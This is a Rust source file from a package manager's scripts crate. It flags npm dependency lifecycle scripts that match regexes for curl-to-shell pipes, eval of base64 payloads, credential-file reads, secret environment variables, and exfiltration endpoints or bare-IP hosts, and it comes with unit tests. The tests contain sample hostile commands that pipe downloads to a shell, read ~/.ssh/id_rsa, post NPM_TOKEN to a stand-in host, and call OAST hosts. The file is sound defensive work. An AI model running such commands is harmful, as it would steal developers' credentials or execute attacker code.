Skip to main content

aube_scripts/
content_sniff.rs

1//! Lightweight content scanner for dependency lifecycle script
2//! bodies.
3//!
4//! Pattern-matches dangerous shapes — shell-pipe (`curl … | sh`),
5//! base64-deobfuscation (`eval(atob(…))`), credential-file reads
6//! (`~/.ssh`, `~/.npmrc`), secret-shaped `process.env` reads,
7//! exfiltration endpoints (Discord/Telegram webhooks, OAST hosts,
8//! bare-IP HTTP) — in a package's `preinstall` / `install` /
9//! `postinstall` scripts. Fired before the user is prompted to
10//! approve a build so the prompt can carry more than just
11//! `name@version`.
12//!
13//! Pure regex matching — no AST parse, no shell-quoting awareness.
14//! False positives are possible (an SDK that legitimately hits a
15//! Discord webhook from a `postinstall` would flag), but lifecycle
16//! script bodies are short and almost never contain bare
17//! `curl … | sh` legitimately, so the FP rate is low in practice.
18//!
19//! Sniffing is advisory: it never blocks an install or write. The
20//! existing `BuildPolicy` allowlist remains the only gate on
21//! whether scripts actually execute.
22
23use aube_manifest::PackageJson;
24use regex::Regex;
25use std::sync::OnceLock;
26
27/// Why a script body got flagged. Each variant carries a one-line
28/// `description` for the user-facing warning and a `category` tag
29/// used by interactive surfaces (`aube approve-builds` picker
30/// labels) that need a short marker.
31///
32/// `Ord` / `PartialOrd` are derived (variant declaration order) so
33/// containers of `Suspicion` are sortable — needed by `Vec<Suspicion>:
34/// Ord` which in turn is needed by `IgnoredEntry`'s derived `Ord`.
35#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, PartialOrd, Ord)]
36pub enum SuspicionKind {
37    /// `curl … | sh`, `wget … | bash`, and friends — fetch a remote
38    /// payload and pipe it to a shell.
39    ShellPipe,
40    /// `eval(atob(…))` / `Function(atob(…))` — runtime decoding of a
41    /// base64 string into executable code. Common dropper shape.
42    EvalDecode,
43    /// Reads from `~/.ssh`, `~/.aws`, `~/.npmrc`, `~/.config/gh` —
44    /// credential files a lifecycle script has no business touching.
45    CredentialFileRead,
46    /// Reads `process.env.*TOKEN`, `*SECRET`, `*API_KEY`, etc. —
47    /// secret-shaped env vars exfilled from CI.
48    SecretEnvRead,
49    /// `discord.com/api/webhooks/`, `api.telegram.org/bot`, OAST
50    /// collaborator hosts (`oast.pro`, `interactsh`, `webhook.site`,
51    /// `pipedream.net`, `ngrok.io`, …) — known exfil channels.
52    ExfilEndpoint,
53    /// `http://1.2.3.4/…` — bare-IP HTTP target. Legitimate packages
54    /// use DNS names; bare IPs are dropper / C2 staging.
55    BareIpHttp,
56}
57
58impl SuspicionKind {
59    pub fn description(self) -> &'static str {
60        match self {
61            Self::ShellPipe => "pipes downloaded content to a shell (curl | sh)",
62            Self::EvalDecode => "decodes and evaluates a base64 payload at runtime",
63            Self::CredentialFileRead => "reads from a credential file (~/.ssh, ~/.aws, ~/.npmrc)",
64            Self::SecretEnvRead => "reads a secret-shaped environment variable",
65            Self::ExfilEndpoint => "contacts a known exfiltration endpoint",
66            Self::BareIpHttp => "contacts a bare-IP HTTP host",
67        }
68    }
69
70    /// Short tag for compact UIs (picker labels). 1–2 words.
71    pub fn category(self) -> &'static str {
72        match self {
73            Self::ShellPipe => "curl|sh",
74            Self::EvalDecode => "eval+decode",
75            Self::CredentialFileRead => "creds read",
76            Self::SecretEnvRead => "secret env",
77            Self::ExfilEndpoint => "exfil URL",
78            Self::BareIpHttp => "bare-IP HTTP",
79        }
80    }
81}
82
83/// One match against a script body.
84#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord)]
85pub struct Suspicion {
86    pub kind: SuspicionKind,
87    /// Name of the lifecycle hook whose body matched
88    /// (`preinstall` / `install` / `postinstall`).
89    pub hook: &'static str,
90}
91
92/// Lifecycle hook names sniffed. Mirrors [`crate::DEP_LIFECYCLE_HOOKS`]
93/// — `prepare` is excluded because aube doesn't run it for installed
94/// tarballs (only the root package and git-dep preparation), so
95/// flagging it would surface noise the user has no path to act on.
96const SNIFFED_HOOKS: &[&str] = &["preinstall", "install", "postinstall"];
97
98struct Rule {
99    kind: SuspicionKind,
100    pattern: &'static str,
101}
102
103const RULES: &[Rule] = &[
104    Rule {
105        kind: SuspicionKind::ShellPipe,
106        // `curl …` or `wget …` followed eventually by `| sh|bash|zsh|node`,
107        // including the path-qualified variants `| /bin/sh`,
108        // `| /usr/local/bin/bash`, etc. `[^\n]*?` keeps the match within
109        // one line so multi-line scripts don't bridge unrelated commands.
110        pattern: r"(?i)\b(?:curl|wget)\b[^\n]*?\|\s*(?:[/\w]*/)?(?:sh|bash|zsh|node)\b",
111    },
112    Rule {
113        kind: SuspicionKind::EvalDecode,
114        pattern: r"(?i)\b(?:eval|Function)\s*\([^)]*\b(?:atob|Buffer\s*\.\s*from)\b",
115    },
116    Rule {
117        kind: SuspicionKind::CredentialFileRead,
118        // `~/.ssh`, `~/.aws`, `~/.npmrc`, `~/.config/gh`, plus the
119        // `$HOME/…` and `${HOME}/…` shell-expansion variants.
120        pattern: r"(?:~|\$\{?HOME\}?)/(?:\.ssh|\.aws|\.npmrc|\.config/gh)\b",
121    },
122    Rule {
123        kind: SuspicionKind::SecretEnvRead,
124        // `process.env.TOKEN`, `process.env.NPM_TOKEN`,
125        // `process.env.AWS_SECRET_ACCESS_KEY`, etc. The prefix and
126        // suffix character classes are zero-or-more so the bare
127        // keyword form (`process.env.TOKEN`) matches without needing a
128        // surrounding identifier — without that, greedy backtracking
129        // never repositions the alternation onto the keyword's first
130        // character. The keyword still has to appear verbatim, which
131        // keeps `process.env.NODE_DEBUG` from flagging.
132        pattern: r"\bprocess\s*\.\s*env\s*\.\s*[A-Z0-9_]*(?:TOKEN|SECRET|PASSWORD|API_?KEY|ACCESS_KEY|PRIVATE_KEY|AUTH)[A-Z0-9_]*\b",
133    },
134    Rule {
135        kind: SuspicionKind::ExfilEndpoint,
136        pattern: r"(?i)\b(?:discord(?:app)?\.com/api/webhooks/|api\.telegram\.org/bot|burpcollaborator\.net|interactsh\.com|oast\.(?:pro|live|fun|me|site|us|asia)|requestbin\.com|webhook\.site|pipedream\.net|ngrok\.io)",
137    },
138    Rule {
139        kind: SuspicionKind::BareIpHttp,
140        // Trailing class catches the post-octet character in every
141        // shape exfil scripts actually use: `/`, `:`, end-of-text,
142        // whitespace (line break or space-delimited curl flag),
143        // quote / paren / `?` / `#`. `.` is intentionally excluded so
144        // DNS hosts that happen to lead with four digit-groups
145        // (`1.2.3.4.example.com`) don't flag.
146        pattern: r#"https?://(?:\d{1,3}\.){3}\d{1,3}(?:[:/\s'"?#)]|$)"#,
147    },
148];
149
150fn compiled() -> &'static [(SuspicionKind, Regex)] {
151    static COMPILED: OnceLock<Vec<(SuspicionKind, Regex)>> = OnceLock::new();
152    COMPILED.get_or_init(|| {
153        RULES
154            .iter()
155            .map(|r| {
156                // RULES is a fixed compile-time table that ships with
157                // aube-scripts, so a bad pattern is a programmer bug
158                // we want to know about at startup, not silently swallow.
159                let re = Regex::new(r.pattern)
160                    .expect("content_sniff rule failed to compile - fix the pattern");
161                (r.kind, re)
162            })
163            .collect()
164    })
165}
166
167/// Scan a dep's manifest for suspicious lifecycle script bodies.
168/// Returns one [`Suspicion`] per (hook, rule) pair that matched.
169/// Empty result for packages with no scripts or no matches.
170pub fn sniff_lifecycle(manifest: &PackageJson) -> Vec<Suspicion> {
171    let mut out = Vec::new();
172    for hook in SNIFFED_HOOKS {
173        let Some(body) = manifest.scripts.get(*hook) else {
174            continue;
175        };
176        for (kind, re) in compiled() {
177            if re.is_match(body) {
178                out.push(Suspicion { kind: *kind, hook });
179            }
180        }
181    }
182    out
183}
184
185#[cfg(test)]
186mod tests {
187    use super::*;
188    use std::collections::BTreeMap;
189
190    fn manifest_with(hook: &str, body: &str) -> PackageJson {
191        let mut scripts = BTreeMap::new();
192        scripts.insert(hook.to_string(), body.to_string());
193        PackageJson {
194            scripts,
195            ..PackageJson::default()
196        }
197    }
198
199    fn kinds(s: &[Suspicion]) -> Vec<SuspicionKind> {
200        s.iter().map(|x| x.kind).collect()
201    }
202
203    #[test]
204    fn empty_manifest_is_clean() {
205        assert!(sniff_lifecycle(&PackageJson::default()).is_empty());
206    }
207
208    #[test]
209    fn benign_postinstall_is_clean() {
210        let m = manifest_with("postinstall", "node ./scripts/copy-types.js");
211        assert!(sniff_lifecycle(&m).is_empty());
212    }
213
214    #[test]
215    fn classic_curl_sh_flags() {
216        let m = manifest_with("postinstall", "curl https://example.com/install.sh | sh");
217        assert_eq!(kinds(&sniff_lifecycle(&m)), vec![SuspicionKind::ShellPipe]);
218    }
219
220    #[test]
221    fn wget_pipe_bash_flags() {
222        let m = manifest_with("install", "wget -qO- http://x.test/i | bash");
223        assert_eq!(kinds(&sniff_lifecycle(&m)), vec![SuspicionKind::ShellPipe]);
224    }
225
226    #[test]
227    fn path_qualified_shell_flags() {
228        // `| /bin/sh`, `| /usr/local/bin/bash` etc. are common
229        // exfil-script variants that bypass a bare-name anchor.
230        let m = manifest_with(
231            "postinstall",
232            "curl https://example.com/install.sh | /bin/sh",
233        );
234        assert_eq!(kinds(&sniff_lifecycle(&m)), vec![SuspicionKind::ShellPipe]);
235    }
236
237    #[test]
238    fn curl_to_file_does_not_flag_pipe() {
239        // `curl -o file.tar.gz` is the prebuild-install / sharp shape —
240        // common and benign. Only the pipe-to-shell form should flag.
241        let m = manifest_with(
242            "install",
243            "curl -L https://github.com/x/y/releases/download/v1/y-linux.tar.gz -o y.tar.gz",
244        );
245        assert!(sniff_lifecycle(&m).is_empty());
246    }
247
248    #[test]
249    fn eval_atob_flags() {
250        let m = manifest_with("preinstall", "node -e \"eval(atob('cGF5bG9hZA=='))\"");
251        assert_eq!(kinds(&sniff_lifecycle(&m)), vec![SuspicionKind::EvalDecode]);
252    }
253
254    #[test]
255    fn function_buffer_from_flags() {
256        let m = manifest_with(
257            "postinstall",
258            "node -e 'new Function(Buffer.from(p, \"base64\").toString())()'",
259        );
260        assert_eq!(kinds(&sniff_lifecycle(&m)), vec![SuspicionKind::EvalDecode]);
261    }
262
263    #[test]
264    fn ssh_dir_read_flags() {
265        let m = manifest_with("postinstall", "cat ~/.ssh/id_rsa | base64");
266        assert_eq!(
267            kinds(&sniff_lifecycle(&m)),
268            vec![SuspicionKind::CredentialFileRead]
269        );
270    }
271
272    #[test]
273    fn home_npmrc_read_flags() {
274        let m = manifest_with("postinstall", "cat $HOME/.npmrc");
275        assert_eq!(
276            kinds(&sniff_lifecycle(&m)),
277            vec![SuspicionKind::CredentialFileRead]
278        );
279    }
280
281    #[test]
282    fn brace_home_aws_read_flags() {
283        let m = manifest_with("postinstall", "tar c ${HOME}/.aws/credentials");
284        assert_eq!(
285            kinds(&sniff_lifecycle(&m)),
286            vec![SuspicionKind::CredentialFileRead]
287        );
288    }
289
290    #[test]
291    fn config_gh_read_flags() {
292        let m = manifest_with("postinstall", "cat ~/.config/gh/hosts.yml");
293        assert_eq!(
294            kinds(&sniff_lifecycle(&m)),
295            vec![SuspicionKind::CredentialFileRead]
296        );
297    }
298
299    #[test]
300    fn process_env_npm_token_flags() {
301        let m = manifest_with(
302            "postinstall",
303            "node -e 'fetch(\"https://h.test\", {body: process.env.NPM_TOKEN})'",
304        );
305        assert_eq!(
306            kinds(&sniff_lifecycle(&m)),
307            vec![SuspicionKind::SecretEnvRead]
308        );
309    }
310
311    #[test]
312    fn process_env_bare_token_flags() {
313        // The bare-keyword form (no surrounding identifier prefix)
314        // is the simplest exfil shape and the one a prefix-greedy
315        // regex would miss via mismatched backtracking.
316        let m = manifest_with(
317            "postinstall",
318            "node -e 'fetch(x, {body: process.env.TOKEN})'",
319        );
320        assert_eq!(
321            kinds(&sniff_lifecycle(&m)),
322            vec![SuspicionKind::SecretEnvRead]
323        );
324    }
325
326    #[test]
327    fn process_env_token_with_trailing_suffix_flags() {
328        // `[A-Z0-9_]*` suffix handles `_VALUE`, `_RAW`, etc. without
329        // breaking the `\b` anchor.
330        let m = manifest_with(
331            "postinstall",
332            "node -e 'console.log(process.env.NPM_TOKEN_VALUE)'",
333        );
334        assert_eq!(
335            kinds(&sniff_lifecycle(&m)),
336            vec![SuspicionKind::SecretEnvRead]
337        );
338    }
339
340    #[test]
341    fn process_env_aws_secret_access_key_flags() {
342        let m = manifest_with(
343            "postinstall",
344            "node -e 'console.log(process.env.AWS_SECRET_ACCESS_KEY)'",
345        );
346        assert_eq!(
347            kinds(&sniff_lifecycle(&m)),
348            vec![SuspicionKind::SecretEnvRead]
349        );
350    }
351
352    #[test]
353    fn process_env_node_debug_does_not_flag() {
354        // Common, benign env read. Confirms the secret-suffix anchor
355        // is doing its job.
356        let m = manifest_with(
357            "postinstall",
358            "node -e 'if (process.env.NODE_DEBUG) console.log(\"debug\")'",
359        );
360        assert!(sniff_lifecycle(&m).is_empty());
361    }
362
363    #[test]
364    fn discord_webhook_flags() {
365        let m = manifest_with(
366            "postinstall",
367            "curl -X POST https://discord.com/api/webhooks/123/abc -d @-",
368        );
369        let k = kinds(&sniff_lifecycle(&m));
370        assert!(k.contains(&SuspicionKind::ExfilEndpoint));
371    }
372
373    #[test]
374    fn telegram_bot_flags() {
375        let m = manifest_with(
376            "postinstall",
377            "curl -s 'https://api.telegram.org/bot$T/sendMessage?chat_id=1&text=ok'",
378        );
379        let k = kinds(&sniff_lifecycle(&m));
380        assert!(k.contains(&SuspicionKind::ExfilEndpoint));
381    }
382
383    #[test]
384    fn webhook_site_flags() {
385        let m = manifest_with("postinstall", "curl https://webhook.site/abcd");
386        let k = kinds(&sniff_lifecycle(&m));
387        assert!(k.contains(&SuspicionKind::ExfilEndpoint));
388    }
389
390    #[test]
391    fn oast_pro_flags() {
392        let m = manifest_with("postinstall", "wget http://abc.oast.pro/$(whoami)");
393        let k = kinds(&sniff_lifecycle(&m));
394        assert!(k.contains(&SuspicionKind::ExfilEndpoint));
395    }
396
397    #[test]
398    fn bare_ip_http_flags() {
399        let m = manifest_with("install", "curl http://192.0.2.5:8080/payload");
400        let k = kinds(&sniff_lifecycle(&m));
401        assert!(k.contains(&SuspicionKind::BareIpHttp));
402    }
403
404    #[test]
405    fn bare_ip_no_path_followed_by_flag_flags() {
406        // `curl http://1.2.3.4 -o file` — space terminates the host.
407        let m = manifest_with("install", "curl http://192.0.2.5 -o payload");
408        let k = kinds(&sniff_lifecycle(&m));
409        assert!(k.contains(&SuspicionKind::BareIpHttp));
410    }
411
412    #[test]
413    fn bare_ip_inside_quoted_url_flags() {
414        // `fetch('http://1.2.3.4')` — single-quote terminates the host.
415        let m = manifest_with("postinstall", "fetch('http://192.0.2.5')");
416        let k = kinds(&sniff_lifecycle(&m));
417        assert!(k.contains(&SuspicionKind::BareIpHttp));
418    }
419
420    #[test]
421    fn bare_ip_on_separate_line_flags() {
422        // Multi-line script with the bare IP not at end-of-text —
423        // `$` would miss this without the `\s` branch in the class.
424        let m = manifest_with(
425            "postinstall",
426            "node setup.js\nwget http://192.0.2.5\necho done",
427        );
428        let k = kinds(&sniff_lifecycle(&m));
429        assert!(k.contains(&SuspicionKind::BareIpHttp));
430    }
431
432    #[test]
433    fn dns_name_does_not_flag_as_bare_ip() {
434        let m = manifest_with("install", "curl http://registry.npmjs.org/path");
435        let k = kinds(&sniff_lifecycle(&m));
436        assert!(!k.contains(&SuspicionKind::BareIpHttp));
437    }
438
439    #[test]
440    fn dns_with_ip_prefix_does_not_flag_as_bare_ip() {
441        // `1.2.3.4.example.com` is a hostname (not a bare IP) and
442        // shouldn't flag — `.` is intentionally not in the trailing
443        // class so the regex declines this shape.
444        let m = manifest_with("install", "curl http://1.2.3.4.example.com/path");
445        let k = kinds(&sniff_lifecycle(&m));
446        assert!(!k.contains(&SuspicionKind::BareIpHttp));
447    }
448
449    #[test]
450    fn multiple_hooks_report_separately() {
451        let mut scripts = BTreeMap::new();
452        scripts.insert(
453            "preinstall".to_string(),
454            "curl https://x.test/i | sh".to_string(),
455        );
456        scripts.insert("postinstall".to_string(), "cat ~/.ssh/id_rsa".to_string());
457        let m = PackageJson {
458            scripts,
459            ..PackageJson::default()
460        };
461        let s = sniff_lifecycle(&m);
462        assert_eq!(s.len(), 2);
463        assert!(
464            s.iter()
465                .any(|x| x.hook == "preinstall" && x.kind == SuspicionKind::ShellPipe)
466        );
467        assert!(
468            s.iter()
469                .any(|x| x.hook == "postinstall" && x.kind == SuspicionKind::CredentialFileRead)
470        );
471    }
472
473    #[test]
474    fn prepare_hook_is_not_sniffed() {
475        // `prepare` doesn't run for installed tarballs in aube, so
476        // flagging it would surface noise the user has no path to
477        // act on.
478        let m = manifest_with("prepare", "curl https://x.test/i | sh");
479        assert!(sniff_lifecycle(&m).is_empty());
480    }
481
482    #[test]
483    fn descriptions_and_categories_are_non_empty() {
484        // Sanity guard: every kind has user-facing strings.
485        for kind in [
486            SuspicionKind::ShellPipe,
487            SuspicionKind::EvalDecode,
488            SuspicionKind::CredentialFileRead,
489            SuspicionKind::SecretEnvRead,
490            SuspicionKind::ExfilEndpoint,
491            SuspicionKind::BareIpHttp,
492        ] {
493            assert!(!kind.description().is_empty());
494            assert!(!kind.category().is_empty());
495        }
496    }
497}